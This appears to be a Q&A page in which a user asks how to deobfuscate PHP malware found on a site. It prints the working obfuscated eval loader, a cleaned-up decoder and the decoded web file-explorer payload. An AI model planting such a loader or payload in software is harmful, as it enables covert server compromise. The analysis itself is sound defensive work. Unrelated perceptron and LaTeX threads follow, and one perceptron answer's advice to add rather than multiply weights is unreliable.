Deobfuscating some PHP code [closed] - php

This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. For help making this question more broadly applicable, visit the help center.
Closed 10 years ago.
I'm trying to deobfuscate this PHP code:
<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else 
$T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E72B89B83E235);$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C13;}}}}eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));?>
Now by using a PHP formatter, I managed to make it display cleanly.
<?php
if (!function_exists("TC9A16C47DA8EEE87")) {
function TC9A16C47DA8EEE87($T059EC46CFE335260)
{
$T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
$TC9A16C47DA8EEE87 = 0;
$TA7FB8B0A1C0E2E9E = 0;
$T17D35BB9DF7A47E4 = 0;
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
$TBF14159DC7D007D3 = 3;
$T77605D5F26DD5248 = 0;
$T4A747C3263CA7A55 = 16;
$T7C7E72B89B83E235 = "";
$T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
$T43D5686285035C13 = __FILE__;
$T43D5686285035C13 = file_get_contents($T43D5686285035C13);
$T6BBC58A3B5B11DC4 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
for (; $TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E; ) {
if (count($T6BBC58A3B5B11DC4))
exit;
if ($T4A747C3263CA7A55 == 0) {
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$T65CE9F6823D588A7 += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
$T4A747C3263CA7A55 = 16;
}
if ($T65CE9F6823D588A7 & 0x8000) {
$TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
$TC9A16C47DA8EEE87 += (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
if ($TC9A16C47DA8EEE87) {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T17D35BB9DF7A47E4++)
$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
} else {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$TA7FB8B0A1C0E2E9E += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
$TBF14159DC7D007D3++;
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
}
} else
$T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
$T65CE9F6823D588A7 <<= 1;
$T4A747C3263CA7A55--;
if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
$T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
$T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
return $T43D5686285035C13;
}
}
}
}
eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>
Now I want to see the base64 text inside the eval function at the end of the file. By using this tool, I get it to see something, but not accurately.
#��<div class="dere��cha mini">provee�dores v.1.0.3</�>
<h3>P</�`?ph��p PIGUI::CheckI�nc(); ?R4>Crearh 4form id="�_�" action="indexA.?op=<
o $op;�&importa*pi` _" methopost"�� onsubmit="retur$n valid.V�rF (t�his.id)"table�# if(dVers Mayor(��_PS_VERSION_, '1��.5.0')) { $ti��endas = $db->Get�Rows("SELECT _s�hop,�name FROM "�._DB_PREFIX_." �AS s ORDER BYAS8�C"tr>
<td>Tr</�$
�c sizepof(
%) > 1`q <sVelect d
"2i�%Tr��equerido" title=q"#opt�Auto ">�l[TODAS]</
"0ea.�ch 0
Eprintf("<\"%u\">%sv\n",I ['']H']r}#?~/�#�2 QelseP#1t3rs[0]0 ech+C['c�2<input typhidden"+A+
;" 9/>C !�p#A8 #<$Nombred%Ztex6�$="30"�""
$�p 1$ABvo0-
radiɗ(pq="Eve�1"""� o d blabel for1"> Sí</AH0D�/>k<b 0�N#�p]%ce��nter" colspan="27tbr PPS6Aceptaaboto(�#;`)'_SESO[�O'control'/?> T^P�p/VF/ m<RLWSJi�sset($_POST4) &&| <B09 $data9pfes�_prepararDatos4)9Q ^QLy(build�_Inser , Yuppli)8_A $8taux _S_idra� _langarray(8pJ'=>,$aopfigMbM 'descriWb''q a_.Lkeywords|_ { (
")
`uu!t`"hxoq == ^'i2'#o(gt]5shIN�vSERT INTO|NTtR( ,�uR) VALUES(%u, %?u)kq$kHB[`]iqis_numyc.4"s*q?t?w$
?? ,. c%Msg('S(e cdo Xp<- 'c'_� 0
5`dujo alg�+ún error Qno'f~#FGEH#deN`H4" =_#GPG1AExistHi|d `F'sF"DTE F" WHERE'r
0'O{
}'9#�>;_!H#$>>`9"$QY*B"' elimin'_'V7e'_'Pa' '-! Џh4؉uale r^ 3/javacfun`on E
SrV<#){yP$Pdrrm�('¿u Id.'+id+'?')R w�ow.locaTpU /Q$Gp݄;&6�=; }
�0</
#> Rl3ath>4xhs:��<$r$#;R,2,ivLe8_.8$nPsA)2hf�19 g'q% �!i/E` ac#D2 f� �'<a =""e" href="Yj'F:&'.].'p'.7I( (lete.png
P16, ��false, true).'</a>'617e /V8pveed8orߜglobal $�d62`\ � switJcase '&':[$#]trim($3qak�c3 ? '1' : '0'Q=defaultunQc E$ahor1e('Y-m�-d H:i:sp!a['�`e_add'cж#upreturn �M
This is where I'm stuck. How else could this be encoded or compressed?

To decode it, I have removed exit from middle of function, then changed eval to print. Here are the results (code under the eval):
?><div class="derecha mini">explorer v.0.0.4</div>
<h3>Explorer</h3>
<?php
PIGUI::CheckInc();
flush();
if (isset($_GET['loc'])) {
$dir = $_GET['loc'];
if (is_file($dir)) {
$dir = dirname($dir);
$file = basename($dir);
} else {
$file = '';
}
} else {
$dir = getcwd();
$file = '';
}
$dir = ponerBarra($dir);
echo $dir . '<br /><br />';
$dirs = array();
$files = array();
$arr = scandir($dir ? $dir : '.');
sort($arr);
foreach ($arr as $item) {
if ($item != '.') {
if (is_dir($dir . $item)) {
$dirs[] = $item;
} else {
$files[] = $item;
}
}
}
foreach ($dirs as $subdir) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s)</span><br />', $pi_importador, $subdir == '..' ? dirname($dir) : $dir . PIGUI::HtmlEntities($subdir), PIGUI::Icon('folder.png', 16, true, true), $subdir, substr(sprintf('%o', fileperms($dir . $subdir)), -4));
flush();
}
foreach ($files as $file) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s) %.2f Kb</span><br />', PIGUI::Icon('page.png', 16, true, true), $file, substr(sprintf('%o', fileperms($dir . $file)), -4), filesize($dir . $file) / 1024);
flush();
}
?>
EDIT: Here's your original code, mostly deobfuscated. Unfortunately, I don't recognize the encoding algorithm:
<?php
/**
 * Decodes the packed payload embedded by the obfuscator.
 *
 * The input is base64 text wrapping an LZSS-style compressed stream (this is
 * compression rather than encryption):
 *   - byte 0 is never read by the decoder;
 *   - bytes 1-2 are the first big-endian 16-bit flag word; a new flag word is
 *     read from the stream after every 16 items;
 *   - flags are consumed most-significant bit first;
 *   - flag 0: copy the next byte verbatim;
 *   - flag 1: the next 12 bits are a back-reference distance.
 *       distance > 0:  the following 4 bits + 3 are the copy length; bytes are
 *                      copied one by one from the output produced so far, so
 *                      the source and destination ranges may overlap;
 *       distance == 0: run of a single byte; the count is
 *                      (second byte << 8) + third byte + 16 and the byte after
 *                      that is the value to repeat.
 *
 * The obfuscated original also read its own source file and called exit when
 * it contained "print", "sprint" or "echo". That anti-tamper check is left out
 * on purpose so the decoder can be used for analysis.
 *
 * The returned text is untrusted code taken from a malware sample: inspect it,
 * never pass it to eval().
 *
 * @param string $source Base64-encoded packed stream.
 * @return string The decoded text prefixed with a PHP closing tag, exactly as
 *                the original decoder returned it.
 * @throws UnexpectedValueException If a back-reference points before the start
 *                                  of the decoded output (corrupt stream).
 */
function decrypt(string $source): string
{
    $packed = (string) base64_decode($source);
    $packedLen = strlen($packed);

    // Reads past the end of the stream yield 0 instead of raising a warning.
    $byteAt = static function (int $offset) use ($packed, $packedLen): int {
        return $offset < $packedLen ? ord($packed[$offset]) : 0;
    };

    $flags = ($byteAt(1) << 8) + $byteAt(2);
    $flagsLeft = 16;
    $cursor = 3;
    $output = '';

    while ($cursor < $packedLen) {
        if ($flagsLeft === 0) {
            $flags = ($byteAt($cursor) << 8) + $byteAt($cursor + 1);
            $cursor += 2;
            $flagsLeft = 16;
        }

        if ($flags & 0x8000) {
            $high = $byteAt($cursor++);
            $low = $byteAt($cursor++);
            $distance = ($high << 4) + ($low >> 4);

            if ($distance !== 0) {
                $length = ($low & 0x0F) + 3;
                $start = strlen($output) - $distance;
                if ($start < 0) {
                    throw new UnexpectedValueException('Back-reference points before the start of the output.');
                }
                // Byte-by-byte on purpose: the copy may read bytes appended by this same loop.
                for ($i = 0; $i < $length; $i++) {
                    $output .= $output[$start + $i];
                }
            } else {
                $length = ($low << 8) + $byteAt($cursor++) + 16;
                $fill = $cursor < $packedLen ? $packed[$cursor] : '';
                $cursor++;
                $output .= str_repeat($fill, $length);
            }
        } else {
            if ($cursor < $packedLen) {
                $output .= $packed[$cursor];
            }
            $cursor++;
        }

        // Only bit 15 is ever tested, so the bits shifted above it are harmless.
        $flags <<= 1;
        $flagsLeft--;
    }

    return '?' . '>' . $output;
}
print (decrypt("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>

Seems like the original poster wants to see what damage was done to their site after being infected. Valid to ask how to deobfuscate the mess. The whole code is PHP malware. Most likely injected onto a PHP-based website. The whole odd function filled with base64 stuff is the payload. And the weird jumping through hoops is the way the original coder decided to obscure their code. If you truly want to see the output, look at the function at the beginning & the eval at the end: The main function is given the hash-like garbage name TC9A16C47DA8EEE87. Knowing that, the last line should be changed to:
echo TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+");
And that will give you the pure base64 of the payload. Past that, not too clear. Maybe further base64 decode? I have faced B.S. like this before & it’s never pleasant. If you are truly fearful, decode this on a safe machine that you don't mind getting hosed in the process. But my guess is this is mainly just a vandalism piece of malware & not something that is mining for secrets deeper than how to cause basic vandalism.

It's not really important to understand the cryptic transformations in the TC9A16C47DA8EEE87. The purpose of this method is to generate executable PHP code from an input string (base64 encoded) that is then passed to eval.
Instead of trying to decode the input string, you could try to just print the return value of TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz..., by using echo instead of eval.

Related

Basic perceptron for AND gate in PHP, am I doing it right? Weird results

I'd like to learn about neural nets starting with the very basic perceptron algorithm. So I've implemented one in PHP and I'm getting weird results after training it. All the 4 possible input combinations return either wrong or correct results (more often the wrong ones).
1) Is there something wrong with my implementation or the results I'm getting are normal?
2) Can this kind of implementation work with more than 2 inputs?
3) What would be the next (easiest) step in learning neural nets after this? Maybe adding more neurons, changing the activation function, or ...?
P.S. I'm pretty bad at math and don't necessarily understand the math behind perceptron 100%, at least not the training part.
Perceptron Class
<?php
namespace Perceptron;
/**
 * Minimal single-neuron perceptron with a step activation.
 *
 * Weights and bias start as random values in [-1, 1] and are adjusted by
 * train() with the perceptron learning rule.
 */
class Perceptron
{
    /** @var int Number of inputs */
    protected $n;

    /** @var array One weight per input */
    protected $weights = [];

    /** @var int|float Bias term added to the weighted sum */
    protected $bias;

    /**
     * @param int $n Number of inputs the perceptron accepts.
     */
    public function __construct(int $n)
    {
        $this->n = $n;
        // Generate random weights for each input
        for ($i = 0; $i < $n; $i++) {
            $this->weights[] = mt_rand(-100, 100) / 100;
        }
        // Generate a random bias
        $this->bias = mt_rand(-100, 100) / 100;
    }

    /**
     * Weighted sum of the inputs plus the bias.
     *
     * @param array $inputs Input values; indices 0..n-1 are read.
     * @return int|float
     */
    public function sum(array $inputs)
    {
        $sum = 0;
        for ($i = 0; $i < $this->n; $i++) {
            $sum += ($inputs[$i] * $this->weights[$i]);
        }
        return $sum + $this->bias;
    }

    /**
     * Step activation: 0 for negative sums, 1 otherwise.
     *
     * @param float $sum
     * @return int
     */
    public function activationFunction(float $sum)
    {
        return $sum < 0.0 ? 0 : 1;
    }

    /**
     * @param array $inputs Input values; indices 0..n-1 are read.
     * @return int 0 or 1
     */
    public function predict(array $inputs)
    {
        return $this->activationFunction($this->sum($inputs));
    }

    /**
     * Runs one pass over the training set, updating weights and bias after
     * every row.
     *
     * @param array $trainingSet  Rows of n input values followed by the expected output at index n.
     * @param float $learningRate Step size applied to each correction.
     */
    public function train(array $trainingSet, float $learningRate)
    {
        foreach ($trainingSet as $row) {
            $inputs = array_slice($row, 0, $this->n);
            $correctOutput = $row[$this->n];
            $error = $correctOutput - $this->predict($inputs);

            // Each weight is corrected from its own input; the previous code
            // derived weight i+1 from weight i, which overwrote it.
            for ($i = 0; $i < $this->n; $i++) {
                $this->weights[$i] += ($learningRate * $inputs[$i] * $error);
            }

            // The bias must be corrected for every row, not once per pass.
            $this->bias += ($learningRate * $error);
        }
    }
}
Main File
<?php
require_once 'vendor/autoload.php';
use Perceptron\Perceptron;
// Create a new perceptron with 2 inputs
$perceptron = new Perceptron(2);
// Test the perceptron
echo "Before training:\n";
$output = $perceptron->predict([0, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([0, 1]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 1]);
echo "{$output} - " . ($output == 1 ? 'correct' : 'nope') . "\n";
// Train the perceptron
$trainingSet = [
// The 3rd column is the correct output
[0, 0, 0],
[0, 1, 0],
[1, 0, 0],
[1, 1, 1],
];
for ($i = 0; $i < 1000; $i++) {
$perceptron->train($trainingSet, 0.1);
}
// Test the perceptron again - now the results should be correct
echo "\nAfter training:\n";
$output = $perceptron->predict([0, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([0, 1]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 1]);
echo "{$output} - " . ($output == 1 ? 'correct' : 'nope') . "\n";
I must thank you for posting this question, I have wanted a chance to dive a little deeper into neural networks. Anyway, down to business. After tinkering around and verbose logging what all is happening, it ended up only requiring 1 character change to work as intended:
public function sum(array $inputs)
{
...
//instead of multiplying the input by the weight, we should be adding the weight
$sum += ($inputs[$i] + $this->weights[$i]);
...
}
With that change, 1000 iterations of training ends up being overkill.
One bit of the code was confusing, different setting of weights:
public function train(array $trainingSet, float $learningRate)
{
foreach ($trainingSet as $row) {
...
$this->weights[0] = $this->weights[0] + ($learningRate * $error);
for ($i = 0; $i < $this->n - 1; $i++) {
$this->weights[$i + 1] =
$this->weights[$i] + ($learningRate * $inputs[$i] * $error);
}
}
I don't necessarily understand why you chose to do it this way. My unexperienced eye would think that the following would work as well.
for ($i = 0; $i < $this->n; $i++) {
$this->weight[$i] += $learningRate * $error;
}
Found my silly mistake, I wasn't adjusting the bias for each row of a training set as I accidentally put it outside the foreach loop. This is what the train() method should look like:
/**
 * Performs one pass over the training set, correcting every weight and the
 * bias after each sample.
 *
 * @param array $trainingSet  Samples made of n input values followed by the expected output at index n.
 * @param float $learningRate Step size applied to each correction.
 */
public function train(array $trainingSet, float $learningRate)
{
    foreach ($trainingSet as $sample) {
        $features = array_slice($sample, 0, $this->n);
        $expected = $sample[$this->n];
        $delta = $expected - $this->predict($features);

        // Weight corrections, one per input
        $k = 0;
        while ($k < $this->n) {
            $this->weights[$k] += ($learningRate * $features[$k] * $delta);
            $k++;
        }

        // Bias correction for this sample
        $this->bias += ($learningRate * $delta);
    }
}
Now I get the correct results after training each time I run the script. Just 100 epochs of training is enough.

PHP - latex format of function with regex

Is it possible to write a regex which would take input like 'sqrt(2 * (2+2)) + sin(pi/6)' and transform it into '\sqrt{2 \cdot (2+2)} + \sin(\pi/6)'?
The problem is the 'sqrt' and parentheses in it. It is obvious I can't simply use something like this:
/sqrt\((.?)\)/ -> \\sqrt{$1}
because this code would create something like this '\sqrt{2 \cdot (2+2)) + \sin(\pi/6}'.
My solution: it simply goes through the string converted to a char array and tests whether the current substring starts with $latex; if it does, a second for-cycle goes from this point in the opposite direction and uses the parentheses to decide where the function starts and ends. (startsWith function)
Code:
/**
 * Rewrites calls such as "sqrt(...)" into LaTeX form such as "\sqrt{...}",
 * turning the parenthesis that closes each call into a closing brace.
 *
 * @param string $function Function name to look for; matched literally when followed by "(".
 * @param string $latex    LaTeX command that replaces the name, e.g. "\\sqrt".
 * @param string $input    Expression to convert.
 * @return string The converted expression.
 */
public static function formatFunction($function, $latex, $input) {
    // Literal replacement: the name is plain text, so it must not be spliced
    // into a regular expression unescaped.
    $input = str_replace($function . "(", $latex . "{", $input);
    $arr = str_split($input);
    $length = count($arr);
    // Right to left, so inner calls are closed before the calls enclosing them.
    for ($i = $length - 1; $i >= 0; $i--) {
        // NOTE(review): startsWith() is defined outside this block; presumably it
        // reports whether its first argument begins with the second - confirm.
        if (!startsWith(substr($input, $i), $latex)) {
            continue;
        }
        // Fresh state for every match, so an unbalanced call cannot leak its
        // "opened" flag into the next scan and overwrite that match's first character.
        $depth = 0;
        $opened = false;
        for ($x = $i; $x < $length; $x++) {
            if ($arr[$x] == "(" || $arr[$x] == "{") {
                $depth++;
                $opened = true;
            } elseif ($arr[$x] == ")" || $arr[$x] == "}") {
                $depth--;
            }
            if ($opened && $depth == 0) {
                // This is the bracket that balances the brace opened by the call.
                $arr[$x] = "}";
                break;
            }
        }
    }
    return implode($arr);
}
Use:
self::formatFunction("sqrt", "\\sqrt",
"sqrt(25 + sqrt(16 - sqrt(49)) + (7 + 1)) + sin(pi/2)");
Output:
\sqrt{25+\sqrt{16-\sqrt{49}}+(7+1)}+\sin (\pi/2)
Note: sin and pi aren't formated by this code, it's only str_replace function...
In general, no regular expression can effectively handle nested parentheses. Sorry to be the bearer of bad news! The MathJAX parser library can interpret LaTeX equations and you could probably add a custom output routine to do what you want.
For TeX questions, you can also try http://tex.stackexchange.com .
Some time ago I solved a similar problem in this way. Maybe it will be helpful for you:
$str = 'sqrt((2 * (2+2)) + sin(pi/(6+7)))';
$from = []; // parentheses content
$to = []; // patterns for replace #<number>
